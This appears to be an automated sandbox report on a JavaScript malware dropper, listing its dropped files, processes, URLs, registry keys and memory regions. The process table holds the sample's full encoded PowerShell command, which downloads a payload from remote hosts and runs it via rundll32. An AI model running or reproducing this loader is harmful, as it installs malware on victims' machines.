Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Semischolastica.js
|
ASCII text, with very long lines (47992), with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\WeigelasScribbleable.js
|
ASCII text, with very long lines (47992), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\WeigelasScribbleable.js:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eg3rnj2e.acv.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsaixmmc.yur.ps1
|
very short file (no magic)
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Semischolastica.js"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness
KnowingestGemmer theoreticianRoundishness
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaAFEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdwBBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBIAGcAQQBhAEEAQgBaAEEASABnAEEAZABBAEIAUgBBAEQAQQBBAFMAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQQA0AEEARQBZAEEATgBRAEIATgBBAEQAVQBBAE4AdwBCAEIAQQBFAG8AQQBaAEEAQQA1AEEARwBJAEEATQB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABUAGUAbgBhAGkAbABsAGUAIABpAG4AIAAkAGkAbQBtAGEAcgBjAGUAcwBjAGkAYgBsAGUAIAAtAHMAcABsAGkAdAAgACIAUQAiACkAIAB7AHQAcgB5ACAAewAkAEEAcgB0AGkAZgBpAGMAaQBhAGwAaQB0AGkAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATwBRAEEAdQBBAEQARQBBAE0AZwBBADIAQQBDADQAQQBNAGcAQQAwAEEARABZAEEATABnAEEANQBBAEQAWQBBACIAOwAkAGgAeQBkAHIAYQB1AGwAaQBjAEMAYQBwAHAAYQBkAG8AYwBpAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAYwBBAE0AUQBBAHUAQQBEAEUAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMABBAEQASQBBAEwAZwBBAHkAQQBEAFEAQQBNAEEAQQA9AEkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAegBBAEMANABBAE0AUQBBADMAQQBEAFEAQQBMAGcAQQB4AEEARABrAEEATgBRAEEAdQBBAEQARQBBAE4AUQBBAHkAQQBBAD0APQBJAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQwBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBjAEEAQgBoAEEASABRAEEAWgBRAEEAdQBBAEgATQBBAGQAUQBCAHcAQQBIAEEAQQBiAEEAQgA1AEEAQQA9AD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAFEAQQAwAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQAaQBtAGIAcgBpAGMAYQB0AGUAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB4AEEASABVAEEAYQBRAEIAawBBAEcARQBBAGIAUQBBAHUAQQBHAFUAQQBiAGcAQgBuAEEARwBrAEEAYgBnAEIAbABBAEcAVQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQA9AFgAdABJAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBAHcAQQBDADQAQQBPAEEAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAWQBBAFgAdABJAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBnAEEAWQBRAEIAdQBBAEcAUQBBAGQAdwBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWgB3AEIAeQBBAEcARQBBAGQAQQBCAHAAQQBIAE0AQQAiADsAJABlAG4AYQBtAGkAbgBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVABlAG4AYQBpAGwAbABlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAZQBuAGEAbQBpAG4AZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHAAYQByAGEAcwBuAGkAYQBCAGUAbAB0AGUAbgBlAC4AVQBuAGgAaQB0AGMAaABlAGQARwBhAG0AYgBhAHMAOwAkAEgAYQB5AGMAbwBjAGsAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBPAEEAQQB1AEEARABnAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAGsAQQBNAEEAQQA9AEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBVAEEAZQBBAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAYQBRAEIAegBBAEcAMABBAEwAZwBCADMAQQBHAFUAQQBZAGcAQgBqAEEARwBFAEEAYgBRAEEAPQBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgATQBBAFkAdwBCAHAAQQBIAFEAQQBhAFEAQgBqAEEARwBFAEEAYgBBAEIARABBAEcARQBBAGMAZwBCADUAQQBHADgAQQBZAHcAQgBoAEEASABJAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQQA9AD0AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE4AQQBHAGsAQQBjAHcAQgB2AEEARwBNAEEAWQBRAEIAdwBBAEcANABBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgAxAEEASABNAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcABhAHIAYQBzAG4AaQBhAEIAZQBsAHQAZQBuAGUALgBVAG4AaABpAHQAYwBoAGUAZABHAGEAbQBiAGEAcwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAOQA4ADAANgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEASABBAEEAWQBRAEIAeQBBAEcARQBBAGMAdwBCAHUAQQBHAGsAQQBZAFEAQgBDAEEARwBVAEEAYgBBAEIAMABBAEcAVQBBAGIAZwBCAGwAQQBDADQAQQBWAFEAQgB1AEEARwBnAEEAYQBRAEIAMABBAEcATQBBAGEAQQBCAGwAQQBHAFEAQQBSAHcAQgBoAEEARwAwAEEAWQBnAEIAaABBAEgATQBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgByAGUAZQBjAGgAYwBsAG8AdABoAFMAbwB1AGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEASABJAEEAWgBRAEIAegBBAEgAQQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgBrAEEARQA4AEEAZABRAEIAMABBAEcASQBBAFkAUQBCAHkAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEATABnAEIAaABBAEcATQBBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEARwBFAEEAYgBnAEIAMABBAEgATQBBAGIAVgBaAHgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYQBBAEIAcABBAEgAQQBBAGQAdwBCAHkAQQBHAGsAQQBaAHcAQgBvAEEASABRAEEAWgBRAEIAeQBBAEgAawBBAEwAZwBCADEAQQBHAHMAQQBiAFYAWgB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAQQBCAGwAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAYwB3AEIAMABBAEYAQQBBAGMAZwBCAGwAQQBHAFUAQQBiAGcAQgBwAEEARwA0AEEAWgB3AEEAdQBBAEcASQBBAGMAZwBCADEAQQBIAE0AQQBjAHcAQgBsAEEARwB3AEEAYwB3AEEAPQAiADsAJABhAGwAaQBlAG4AaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBADUAQQBDADQAQQBNAFEAQQAxAEEARABjAEEAIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA=
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://nuget.org/NuGet.exe
|
unknown
|
||
https://github.com/imaya/zlib.js
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
There are 1 hidden URLs, click here to show them.
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
17FB9259000
|
heap
|
page read and write
|
||
2F2CFF000
|
stack
|
page read and write
|
||
1CC97BB4000
|
heap
|
page read and write
|
||
7FFC9FA01000
|
trusted library allocation
|
page read and write
|
||
17FB93ED000
|
heap
|
page read and write
|
||
17FB9172000
|
heap
|
page read and write
|
||
21D7D7C0000
|
trusted library allocation
|
page read and write
|
||
21D7D900000
|
trusted library allocation
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
21D7DA60000
|
trusted library allocation
|
page read and write
|
||
17FB9290000
|
heap
|
page read and write
|
||
1CC99961000
|
heap
|
page read and write
|
||
21D65AA1000
|
trusted library allocation
|
page read and write
|
||
1CC9990C000
|
heap
|
page read and write
|
||
2F2DFF000
|
stack
|
page read and write
|
||
7FFC9FAB0000
|
trusted library allocation
|
page read and write
|
||
1CC9995C000
|
heap
|
page read and write
|
||
21D63140000
|
trusted library allocation
|
page read and write
|
||
17FB93B3000
|
heap
|
page read and write
|
||
17FB93F1000
|
heap
|
page read and write
|
||
1CC99981000
|
heap
|
page read and write
|
||
17FB72C8000
|
heap
|
page read and write
|
||
1CC97BB2000
|
heap
|
page read and write
|
||
21D65D8C000
|
trusted library allocation
|
page read and write
|
||
17FB910D000
|
heap
|
page read and write
|
||
17FB93CF000
|
heap
|
page read and write
|
||
1CC99D5B000
|
heap
|
page read and write
|
||
7FFC9FA40000
|
trusted library allocation
|
page execute and read and write
|
||
1CC9995D000
|
heap
|
page read and write
|
||
7DF405C00000
|
trusted library allocation
|
page execute and read and write
|
||
17FB9117000
|
heap
|
page read and write
|
||
17FB74E5000
|
heap
|
page read and write
|
||
21D66004000
|
trusted library allocation
|
page read and write
|
||
17FB9595000
|
heap
|
page read and write
|
||
1CC97CB0000
|
heap
|
page read and write
|
||
1CC99C3D000
|
heap
|
page read and write
|
||
1CC99935000
|
heap
|
page read and write
|
||
1CC99D63000
|
heap
|
page read and write
|
||
21D64F30000
|
trusted library allocation
|
page read and write
|
||
1CC97D35000
|
heap
|
page read and write
|
||
17FB939D000
|
heap
|
page read and write
|
||
1CC99D31000
|
heap
|
page read and write
|
||
17FB92AE000
|
heap
|
page read and write
|
||
17FB9195000
|
heap
|
page read and write
|
||
1CC99982000
|
heap
|
page read and write
|
||
21D64F9A000
|
heap
|
page read and write
|
||
21D65B2C000
|
trusted library allocation
|
page read and write
|
||
1CC99902000
|
heap
|
page read and write
|
||
21D7D980000
|
trusted library allocation
|
page read and write
|
||
21D62E00000
|
heap
|
page read and write
|
||
21D7D9FE000
|
trusted library allocation
|
page read and write
|
||
17FB94F4000
|
heap
|
page read and write
|
||
21D7D031000
|
heap
|
page read and write
|
||
17FB93F1000
|
heap
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
1CC99DF5000
|
heap
|
page read and write
|
||
21D651B0000
|
trusted library allocation
|
page read and write
|
||
21D66015000
|
trusted library allocation
|
page read and write
|
||
21D7D24A000
|
heap
|
page read and write
|
||
17FB93EA000
|
heap
|
page read and write
|
||
1CC99DB3000
|
heap
|
page read and write
|
||
1CC99D62000
|
heap
|
page read and write
|
||
17FB9261000
|
heap
|
page read and write
|
||
21D7D540000
|
trusted library allocation
|
page read and write
|
||
1CC999CD000
|
heap
|
page read and write
|
||
1CC97D3A000
|
heap
|
page read and write
|
||
1CC99C03000
|
heap
|
page read and write
|
||
21D6300E000
|
heap
|
page read and write
|
||
17FB94EF000
|
heap
|
page read and write
|
||
17FB91B0000
|
heap
|
page read and write
|
||
17FB92B1000
|
heap
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
17FB93E8000
|
heap
|
page read and write
|
||
17FB91A0000
|
heap
|
page read and write
|
||
1CC97AE9000
|
heap
|
page read and write
|
||
17FB9406000
|
heap
|
page read and write
|
||
17FB93F2000
|
heap
|
page read and write
|
||
1CC97D3D000
|
heap
|
page read and write
|
||
17FB928F000
|
heap
|
page read and write
|
||
17FB951C000
|
heap
|
page read and write
|
||
21D74FA1000
|
trusted library allocation
|
page read and write
|
||
17FB94B1000
|
heap
|
page read and write
|
||
1CC99AAC000
|
heap
|
page read and write
|
||
1CC9994C000
|
heap
|
page read and write
|
||
17FB92AE000
|
heap
|
page read and write
|
||
17FB9528000
|
heap
|
page read and write
|
||
17FB7270000
|
heap
|
page read and write
|
||
17FB94DD000
|
heap
|
page read and write
|
||
1CC99D3A000
|
heap
|
page read and write
|
||
7FFC9FAE0000
|
trusted library allocation
|
page read and write
|
||
21D62F90000
|
heap
|
page read and write
|
||
1CC97AFE000
|
heap
|
page read and write
|
||
21D65D79000
|
trusted library allocation
|
page read and write
|
||
1CC99C43000
|
heap
|
page read and write
|
||
17FB9129000
|
heap
|
page read and write
|
||
1CC97AFF000
|
heap
|
page read and write
|
||
17FB9110000
|
heap
|
page read and write
|
||
1CC99D87000
|
heap
|
page read and write
|
||
21D7D25A000
|
heap
|
page read and write
|
||
21D7D204000
|
heap
|
page read and write
|
||
17FB9406000
|
heap
|
page read and write
|
||
17FB9299000
|
heap
|
page read and write
|
||
17FB94DA000
|
heap
|
page read and write
|
||
21D65A99000
|
trusted library allocation
|
page read and write
|
||
B7D83FE000
|
stack
|
page read and write
|
||
21D65A36000
|
trusted library allocation
|
page read and write
|
||
B7D84FE000
|
stack
|
page read and write
|
||
32E168E000
|
stack
|
page read and write
|
||
17FB9583000
|
heap
|
page read and write
|
||
1CC99D11000
|
heap
|
page read and write
|
||
1CC99961000
|
heap
|
page read and write
|
||
17FB94E6000
|
heap
|
page read and write
|
||
1CC99D36000
|
heap
|
page read and write
|
||
17FB953C000
|
heap
|
page read and write
|
||
1CC97D3D000
|
heap
|
page read and write
|
||
21D65FB1000
|
trusted library allocation
|
page read and write
|
||
21D65A74000
|
trusted library allocation
|
page read and write
|
||
1CC99E89000
|
heap
|
page read and write
|
||
17FB94FC000
|
heap
|
page read and write
|
||
17FB92B0000
|
heap
|
page read and write
|
||
1CC97BAD000
|
heap
|
page read and write
|
||
1CC99BFD000
|
heap
|
page read and write
|
||
21D7DA30000
|
trusted library allocation
|
page read and write
|
||
17FB9155000
|
heap
|
page read and write
|
||
32E178E000
|
stack
|
page read and write
|
||
17FB93E8000
|
heap
|
page read and write
|
||
21D7D7F0000
|
trusted library allocation
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
21D7D770000
|
trusted library allocation
|
page read and write
|
||
17FB74E9000
|
heap
|
page read and write
|
||
17FB951F000
|
heap
|
page read and write
|
||
21D65BA8000
|
trusted library allocation
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
17FB9199000
|
heap
|
page read and write
|
||
21D65A7E000
|
trusted library allocation
|
page read and write
|
||
1CC99979000
|
heap
|
page read and write
|
||
17FB9406000
|
heap
|
page read and write
|
||
1CC99DB8000
|
heap
|
page read and write
|
||
17FB917D000
|
heap
|
page read and write
|
||
21D65AB3000
|
trusted library allocation
|
page read and write
|
||
17FB9501000
|
heap
|
page read and write
|
||
21D631B5000
|
heap
|
page read and write
|
||
21D7D091000
|
heap
|
page read and write
|
||
21D66A7D000
|
trusted library allocation
|
page read and write
|
||
21D7D094000
|
heap
|
page read and write
|
||
21D7DA14000
|
trusted library allocation
|
page read and write
|
||
17FB94EA000
|
heap
|
page read and write
|
||
17FB94E7000
|
heap
|
page read and write
|
||
17FB90B2000
|
heap
|
page read and write
|
||
1CC99D38000
|
heap
|
page read and write
|
||
1CC9991C000
|
heap
|
page read and write
|
||
21D66049000
|
trusted library allocation
|
page read and write
|
||
21D64FA1000
|
trusted library allocation
|
page read and write
|
||
21D64F70000
|
trusted library allocation
|
page read and write
|
||
17FB90C4000
|
heap
|
page read and write
|
||
21D64F39000
|
trusted library allocation
|
page read and write
|
||
21D63100000
|
heap
|
page readonly
|
||
7FFC9FA32000
|
trusted library allocation
|
page read and write
|
||
17FB73B8000
|
heap
|
page read and write
|
||
1CC99A01000
|
heap
|
page read and write
|
||
21D64F40000
|
trusted library allocation
|
page read and write
|
||
17FB9103000
|
heap
|
page read and write
|
||
1CC99D16000
|
heap
|
page read and write
|
||
17FB95F5000
|
heap
|
page read and write
|
||
1CC99D62000
|
heap
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
17FB94DA000
|
heap
|
page read and write
|
||
1CC99DB5000
|
heap
|
page read and write
|
||
17FB72E7000
|
heap
|
page read and write
|
||
17FB9548000
|
heap
|
page read and write
|
||
1CC99900000
|
heap
|
page read and write
|
||
21D66A3D000
|
trusted library allocation
|
page read and write
|
||
17FB74ED000
|
heap
|
page read and write
|
||
17FB9285000
|
heap
|
page read and write
|
||
1CC99D7C000
|
heap
|
page read and write
|
||
17FB93F8000
|
heap
|
page read and write
|
||
17FB93EC000
|
heap
|
page read and write
|
||
21D63049000
|
heap
|
page read and write
|
||
17FB919D000
|
heap
|
page read and write
|
||
1CC9997B000
|
heap
|
page read and write
|
||
7FFC9FB00000
|
trusted library allocation
|
page read and write
|
||
17FB90BD000
|
heap
|
page read and write
|
||
21D65D6C000
|
trusted library allocation
|
page read and write
|
||
1CC99C11000
|
heap
|
page read and write
|
||
17FB8D60000
|
heap
|
page read and write
|
||
1CC999E9000
|
heap
|
page read and write
|
||
17FB9255000
|
heap
|
page read and write
|
||
1CC99D39000
|
heap
|
page read and write
|
||
1CC99D9C000
|
heap
|
page read and write
|
||
1CC99939000
|
heap
|
page read and write
|
||
21D65A47000
|
trusted library allocation
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
17FB9526000
|
heap
|
page read and write
|
||
1CC99920000
|
heap
|
page read and write
|
||
1CC99DA1000
|
heap
|
page read and write
|
||
17FB9106000
|
heap
|
page read and write
|
||
17FB912C000
|
heap
|
page read and write
|
||
7FFC9F86C000
|
trusted library allocation
|
page read and write
|
||
21D63053000
|
heap
|
page read and write
|
||
1CC99948000
|
heap
|
page read and write
|
||
17FB9136000
|
heap
|
page read and write
|
||
21D7D1D1000
|
heap
|
page read and write
|
||
21D7CFA8000
|
heap
|
page read and write
|
||
7FFC9F970000
|
trusted library allocation
|
page execute and read and write
|
||
32E01C5000
|
stack
|
page read and write
|
||
21D64F60000
|
trusted library allocation
|
page read and write
|
||
1CC99904000
|
heap
|
page read and write
|
||
17FB90B7000
|
heap
|
page read and write
|
||
2F2EFE000
|
stack
|
page read and write
|
||
32E158F000
|
stack
|
page read and write
|
||
21D7D970000
|
trusted library allocation
|
page read and write
|
||
21D64F31000
|
trusted library allocation
|
page read and write
|
||
17FB94EC000
|
heap
|
page read and write
|
||
21D64F30000
|
trusted library allocation
|
page read and write
|
||
1CC99C40000
|
heap
|
page read and write
|
||
1CC97B9A000
|
heap
|
page read and write
|
||
21D7DA10000
|
trusted library allocation
|
page read and write
|
||
1CC9996B000
|
heap
|
page read and write
|
||
21D7D6D0000
|
trusted library allocation
|
page read and write
|
||
17FB93DE000
|
heap
|
page read and write
|
||
17FB939F000
|
heap
|
page read and write
|
||
1CC99DB4000
|
heap
|
page read and write
|
||
17FB90F9000
|
heap
|
page read and write
|
||
21D66C9C000
|
trusted library allocation
|
page read and write
|
||
17FB96B0000
|
heap
|
page read and write
|
||
1CC99FF6000
|
heap
|
page read and write
|
||
17FB74E0000
|
heap
|
page read and write
|
||
21D65D98000
|
trusted library allocation
|
page read and write
|
||
21D7D1CD000
|
heap
|
page read and write
|
||
17FB926B000
|
heap
|
page read and write
|
||
21D7D8C0000
|
trusted library allocation
|
page read and write
|
||
17FB954D000
|
heap
|
page read and write
|
||
21D65FA5000
|
trusted library allocation
|
page read and write
